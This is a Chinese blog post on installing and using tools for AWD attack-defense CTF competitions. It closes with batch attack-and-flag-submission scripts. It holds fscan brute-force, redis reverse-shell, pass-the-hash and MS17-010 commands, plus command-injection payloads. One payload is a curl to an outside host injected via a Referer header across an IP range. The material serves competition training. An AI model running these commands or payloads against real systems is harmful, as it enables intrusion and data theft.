首页 > 其他分享 >awd工具安装

awd工具安装

时间:2024-06-17 09:56:55浏览次数:13  
标签:exe 1.1 fscan 192.168 url flag 工具 awd 安装

fscan(漏洞扫描)

下载

下载地址: Releases · shadow1ng/fscan · GitHub

把下载的文件放到指定文件目录里,

在文件的位置打开cmd

输入 fscan64.exe -h 192.168.1.1/24

ok了

接下来说说fscan的使用

使用

1.信息搜集:

  • 存活探测(icmp)

  • 端口扫描

2.爆破功能:

  • 各类服务爆破(ssh、smb等)

  • 数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

  • 获取目标网卡信息

  • 高危漏洞扫描(ms17010等)

4.Web探测功能:

  • webtitle探测

  • web指纹识别(常见cms、oa框架等)

  • web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

  • redis写公钥或写计划任务

  • ssh命令执行

6.其他功能:

  • 文件保存

命令如下:

.\fscan64.exe -h 172.17.171.10 -p 1-65535
fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

Aazhen-V3.1

下载:GitHub - zangcc/Aazhen-RexHa: 自研JavaFX图形化漏洞扫描工具,支持扫描的漏洞分别是: ThinkPHP-2.x-RCE, ThinkPHP-5.0.23-RCE, ThinkPHP5.0.x-5.0.23通杀RCE, ThinkPHP5-SQL注入&敏感信息泄露, ThinkPHP 3.x 日志泄露NO.1, ThinkPHP 3.x 日志泄露NO.2, ThinkPHP 5.x 数据库信息泄露的漏洞检测,以及批量检测的功能。漏洞POC基本适用ThinkPHP全版本漏洞。

ThinkPHPGUI

下载:GitHub - Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。

Diffmerge(比较不同)

下载: SourceGear | DiffMerge

Windows版本不支持自定义安装目录,默认是:C\ProgramFiles\SourceGear\Common\DiffMerge\

D盾(扫描文件漏洞)

下载: D盾防火墙

D盾免杀:D盾安装使用及D盾免杀_d盾官网-CSDN博客

Seay(代码审计)

下载: GitHub - f1tz/cnseay: Seay源代码审计系统

watchbird(waf)

下载:Releases · leohearts/awd-watchbird · GitHub

将waf.so,watchbird.php文件存放在/var/www/html或其他目录中

确保当前用户对目标目录可写

执行php watchbird.php --install [Web目录], 安装器将输出安装了watchbird的文件路径

访问任意启用了waf的文件, 参数?watchbird=ui打开watchbird控制台, 创建一个初始密码

如需卸载, 请在相同的位置输入php watchbird.php --uninstall [Web目录], 如果您多次运行了安装,请多次运行卸载直到卸载器无输出

网站备份文件泄露扫描

地址:GitHub - sry309/ihoneyBakFileScan: 多进程批量网站备份文件泄露扫描工具v0.2

批量攻击提交flag脚本

import requests
def regeister():
    url ='http://localhost:8801/index.php?c=User&a=register'
 
    data = {
        'username':'1234',
        'password':'1234',
        'sex':0,
        'age':18
    }
    res = requests.post(url=url,data=data)
 
    if res.status_code == 200:
        print('注册成功')
    else:
        print('注册失败')
def login():
    url1='http://localhost:8801/'
    grame = {
        'username':'1234',
        'password':'1234',
 
    }
    res = requests.post(url=url1,data=grame)
    if res.status_code==200:
        print('登录成功')
    else:
        print('登录失败')
def usevu():
    url2 = 'http://localhost:8801/index.php?c=User&a=ping'
    data={
        'host':';cat /flag'
    }
    res = requests.post(url=url2,data=data)
    if res.status_code==200:
        flag=res.text
        print(flag)
        return flag
    else:
        print('查找失败')
def submit(flags):
    url = 'http://localhost:19999/api/flag'
    headers={
        "Content-Type": "application/json",
        "Authorization": "e8b084904533203d71dbc24f6f2009c5"
    }
    flag=flags
    data = {
        "flag":flag
    }
    res = requests.post(url=url,json=data,headers=headers)
    if res.status_code==200:
        print('提交成功')
    else:
        print('提交失败')
if __name__=='__main__':
    regeister()
    login()
    flags=usevu()
    submit(flags=flags)
import requests
import re
​
path = '/WebApi/competitionCyberRange/static/base/#/competition/route/competiManage/competiAnswer'   # 攻击路径
​
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0',
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
          "Accept-Language": 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': 'JSESSIONID=823B9BC42B2A423CD515CEAEC3ECCDAA'
}
​
data = {
    'ip': '127.0.0.1|arp -a',
    'Submit': 'Submit'
}
​
#flag提交地址
url_flag = 'http://10.0.0.1/submit.php?token=123456&flag='
​
#批量攻击和提交
def attack():
    with open('urls.txt', 'r') as file:
        for line in file:
            url = line.strip()  + path      # 攻击url
            ret = requests.post(url=url, headers=headers, data=data, timeout=10)
            #print("Response:", ret.text)  # 调试输出
            flag_match = re.search(r'flag\{.+\}', ret.text)
            if flag_match:
                flag = flag_match.group()
                print("Flag:", flag)
                flag_url = url_flag + flag
                #res = requests.post(url=flag_url,headers=headers,timeout=2)   #注意这里的headers可能有问题,需要根据实际情况修改
                print(res.text)
            else:
                print(line.strip() +  " Flag not found")
attack()
import requests

for i in range(101, 200):
    url = f"http://172.19.{i}.42/api/v1.token/test"
    try:
        headers = {'Referer': 'system("curl http://10.10.1.50:9028/competition/flagManager/getFlag");'}
        req = requests.post(url, headers=headers)
        print(f"172.19.{i}.42", end="-")
        print(req.text)
    except Exception as e:
        print("next")

ehole(指纹识别)

下载: https://github.com/EdgeSecurityTeam/Ehole/releases

使用: .\EHole_windows_amd64.exe -u https://xxxxx

cms漏洞库:https://github.com/jayimu/vul_wiki

识别出来进行复现

标签:exe,1.1,fscan,192.168,url,flag,工具,awd,安装
From: https://blog.csdn.net/biu801/article/details/139720990

相关文章

  • 一个开源的快速准确地将 PDF 转换为 markdown工具
    大家好,今天给大家分享的是一个开源的快速准确地将PDF转换为markdown工具。Marker是一款功能强大的PDF转换工具,它能够将PDF文件快速、准确地转换为Markdown格式。这款工具特别适合处理书籍和科学论文,支持所有语言的转换,并且能够去除页眉、页脚等干扰元素,格式化表格和代码块,提......
  • layui 构建工具gulp打包LayuiAdmin
    https://blog.csdn.net/u010334503/article/details/128762800项目可采用gulp构建,gulpfile.js是任务脚本,package.json是任务配置文件step1:确保你的电脑已经安装好了Node.jsstep2:命令行安装gulp:npminstallgulp-gstep3:切换到该项目根目录(即gulpfile.js所在目录),命令行......
  • 在Linux中,有哪些常用的网络管理工具?
    在Linux中,网络管理工具非常多样,它们可以帮助系统管理员监控、配置和故障排除网络。以下是一些常用的网络管理工具:ifconfig(或ip):ifconfig(在较新的系统中被ip命令取代)用于显示和配置网络接口。例如,ipaddrshow可以显示所有网络接口的状态。ip:ip命令是一个多功能的......
  • 网络诊断工具iPerf的使用
    iPerf是一个网络性能测试工具,用于测量最大TCP和UDP带宽性能。它支持多种平台,包括Windows、Linux、macOS等。以下是iPerf的基本使用方法:安装iPerf在Linux系统中,你可以使用包管理器来安装iPerf。在Ubuntu或Debian系统中,你可以使用以下命令:sudoapt-getupdates......
  • Docker系列 V2 - Docker安装jdk8
    安装的两种方式通过已有的镜像直接pull安装;自己通过dockerfile等命令打包一个镜像安装(此种方式我们到已有镜像满足不了自身需求时使用);本章是根据第一种方式安装的【1.1】安装镜像根据文章docker安装指定版本的tag镜像得到安装JDK的Docker命令dockerpullprimetoninc/j......
  • 基础篇——Kali渗透工具初见
    基础篇——Kali渗透工具初见1.nc(netcat/ncat)nc常用于监听端口:nc-lvp6666//监听6666端口,列出详细信息也可以用于连接端口:nc192.168.118.1286666//尝试连接192.168.118.128的6666端口在渗透测试中,nc通常用于监听端口以获得正向shell或反弹shell。(1)正向shell目......
  • Docker系列 V1 - 在 Ubuntu 24.04 LTS 上安装 Docker
    在Ubuntu24.04LTS上,虽然可以通过Ubuntu的官方仓库直接安装Docker,但是这种方法通常无法获取到最新的Docker版本,而且安全更新也可能延迟。因此,推荐从Docker的官方仓库进行安装,确保可以用上最新版本并和自动更新。第1步:更新软件包并安装必要软件运行以下命令,更新软件......
  • BookKeeper 介绍(2)--安装
    本文主要介绍Bookkeeper的安装,文中所使用到的软件版本:Java1.8.0_321、BookKeeper4.16.5、CentOS 7.9.2009。1、单机安装官网(https://bookkeeper.apache.org/releases)下载安装包并解压:tarzxvfbookkeeper-server-4.16.5-bin.tar.gz在单台机器上允许多个bookies:bin......
  • JDK 的下载与安装
    1、下载下载地址:JavaDownloads|Oracle中国2、安装:运行下载的文件3、配置环境变量JAVA_HOME4、配置环境变量Path4.1%JAVA_HOME%\bin4.2%JAVA_HOME%\jre\bin由于安装的JDK17未含有jre文件夹,需要创建。step1:以管理员身份运行cmdstep2:切换至jdk所......
  • 盘点国内外免费AI视频工具,助你先人一步拥抱AI
    哈喽,各位小伙伴们好,我是给大家带来各类黑科技与前沿资讯的小武。6月13日,LumaAI在X平台(原Twitter)宣布其视频生成模型DreamMachine开放测试,并提供免费试用,这在海外AI圈掀起了一股热潮,被视为对标OpenAI尚未公开发布的Sora视频模型的有力竞争者。国内市场也同样......